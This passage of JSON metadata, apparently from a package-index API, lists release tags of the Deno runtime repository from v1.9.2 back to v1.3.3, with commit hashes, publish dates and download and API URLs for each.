a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":